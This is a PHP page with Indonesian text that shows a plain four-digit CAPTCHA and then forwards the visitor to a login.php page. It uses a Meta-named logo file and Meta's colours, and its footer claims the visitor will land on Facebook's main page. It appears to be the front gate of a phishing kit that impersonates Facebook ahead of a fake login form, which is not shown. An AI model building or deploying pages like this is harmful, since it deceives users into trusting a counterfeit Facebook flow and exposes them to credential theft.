<?php
session_start();

// Menangani verifikasi CAPTCHA
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    if ($_POST['captcha'] == $_SESSION['captcha_code']) {
        // Jika CAPTCHA benar, arahkan ke halaman utama
        $_SESSION['verified'] = true;
        header("Location: login.php");
        exit;
    } else {
        // Jika CAPTCHA salah
        $error_message = "CAPTCHA tidak valid, coba lagi.";
    }
}

// Membuat CAPTCHA secara acak
$captcha_code = rand(1000, 9999);  // Menghasilkan angka 4 digit
$_SESSION['captcha_code'] = $captcha_code;  // Menyimpan CAPTCHA di session
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verifikasi CAPTCHA</title>
    <link rel="icon" href="img/logometa.png">
    <style>
        body {
            font-family: Arial, sans-serif;
            background: #ffffff;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            color: #333;
        }

        .captcha-container {
            background: white;
            padding: 40px;
            border-radius: 8px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            text-align: center;
            max-width: 400px;
            width: 100%;
        }

        h1 {
            font-size: 24px;
            margin-bottom: 20px;
            color: #0078f6;
        }

        .captcha-code {
            font-size: 30px;
            font-weight: bold;
            background-color: #0078f6;
            padding: 10px 20px;
            border: 1px solid #ddd;
            display: inline-block;
            margin-bottom: 20px;
            color: white;
        }

        input[type="text"] {
            width: 60%;
            padding: 10px;
            font-size: 16px;
            margin-bottom: 20px;
            border: 1px solid #ccc;
            border-radius: 4px;
        }

        .error-message {
            color: #f44336;
            font-size: 14px;
            margin-bottom: 20px;
        }

        .captcha-btn {
            background-color: #0064e0;
            color: white;
            padding: 10px 120px;
            border: none;
            border-radius: 25px;
            cursor: pointer;
            font-size: 16px;
        }

        .captcha-btn:hover {
            background-color: #45a049;
        }

        .footer {
            margin-top: 20px;
            font-size: 12px;
            color: #777;
        }
    </style>
</head>
<body>

<div class="captcha-container">
    
    <h1>Verifikasi CAPTCHA terlebih dahulu</h1>
    <?php if (isset($error_message)) { ?>
        <div class="error-message"><?= $error_message ?></div>
    <?php } ?>
    
    <div class="captcha-code"><?= $captcha_code ?></div>

    <form action="captcha.php" method="post">
        <label for="captcha">Masukkan kode di atas:</label>
        <input type="text" name="captcha" id="captcha" required>
        <br>
        <button type="submit" class="captcha-btn">Verifikasi</button>
    </form>
    
    <div class="footer">
        <p>Jika sudah benar, maka anda akan otomatis diarahkan ke halaman utama Facebook.</p>
    </div>
</div>

</body>
</html>
